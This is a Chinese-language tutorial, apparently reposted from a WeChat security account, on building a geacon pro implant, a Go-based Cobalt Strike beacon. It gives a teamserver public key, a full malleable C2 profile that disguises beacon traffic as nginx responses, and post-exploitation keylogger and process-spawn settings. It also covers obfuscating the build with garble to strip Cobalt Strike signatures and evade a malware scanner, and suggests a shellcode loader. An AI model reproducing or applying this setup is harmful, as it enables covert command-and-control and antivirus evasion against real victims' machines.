geacon pro使用教程

水一下文章

这里我们采用的是编译为exe方法，从源码入手

配置RsaPublicKey

这里我们用的环境是cs4.7 火绒,从teamserver中把beacon_key放入geacon_protoolsBeaconTooloutartifactsBeaconTool_jar 目录解密

这里我们就只需要提取公钥

-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCgUinQr5wv4CQaw0pVHUb+hmc0xchaOaC4hJhc
4HVRN64MT2U2F4x+A+x2DGevp+yM1QLyQLN3sZpEpnCK8vyg2JmKGccwNak6NAg1q7Ur6ZA6nFkq
s9IhRtFw86eI3K0nRdaqRsKKDCz36YSObQEo7w0O/9qVJHeFKPe1oMJYQwIDAQAB
-----END PUBLIC KEY-----

将公钥替换掉congfig中的

之后填写

这里的C2是你的那个监听器的

这里需要注意一个点

teamserver运行时记得加上那个配置文件

作者提供了默认的配置文件

# default sleep time is 60s
set sleeptime "3000";
set jitter "7";

https-certificate {
    set C "KZ";
    set CN "foren.zik";
    set O "NN Fern Sub";
    set OU "NN Fern";
    set ST "KZ";
    set validity "365";
}

# define indicators for an HTTP GET
http-get {

    set uri "/www/handle/doc";

    client {
        #header "Host" "aliyun.com";
        # base64 encode session metadata and store it in the Cookie header.
        metadata {
            base64url;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }

    server {
        # server should send output with no changes
        #header "Content-Type" "application/octet-stream";
        header "Server" "nginx/1.10.3 (Ubuntu)";
            header "Content-Type" "application/octet-stream";
            header "Connection" "keep-alive";
            header "Vary" "Accept";
            header "Pragma" "public";
            header "Expires" "0";
            header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";

        output {
            mask;
            netbios;
            prepend "data=";
            append "%%";
            print;
        }
    }
}

# define indicators for an HTTP 
http-post {
    # Same as above, Beacon will randomly choose from this pool of URIs [if multiple URIs are provided]
    set uri "/IMXo";
    client {
        #header "Content-Type" "application/octet-stream";              

        # transmit our session identifier as /submit.php?id=[identifier]
        
        id {                
            mask;
            netbiosu;
            prepend "user=";
            append "%%";
            header "User";
        }

        # post our output with no real changes
        output {
            mask;
            base64url;
            prepend "data=";
            append "%%";        
            print;
        }
    }

    # The server's response to our HTTP POST
    server {
        header "Server" "nginx/1.10.3 (Ubuntu)";
            header "Content-Type" "application/octet-stream";
            header "Connection" "keep-alive";
            header "Vary" "Accept";
            header "Pragma" "public";
            header "Expires" "0";
            header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";

        # this will just print an empty string, meh...
        output {
            mask;
            netbios;
            prepend "data=";
            append "%%";
            print;
        }
    }
}

post-ex {
    set spawnto_x86 "c:\windows\syswow64\rundll32.exe";
    set spawnto_x64 "c:\windows\system32\rundll32.exe";
    
    set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";
    set pipename "DserNamePipe##, PGMessagePipe##, MsFteWds##";
    set keylogger "SetWindowsHookEx";
}

之后直接go build

放微步看下

虽然说被识别成了恶意 但是他没有cs特征啊

这里我们用garble再次试下 ，成功上线

看下微步

还行 从牛马变成小牛马

这里免杀效果就不测了，主要的就是他没有了cs的特征

之后可以转成shellcode调用win32api 老一套加载上线

原文始发于微信公众号（老鑫安全）：geacon pro使用教程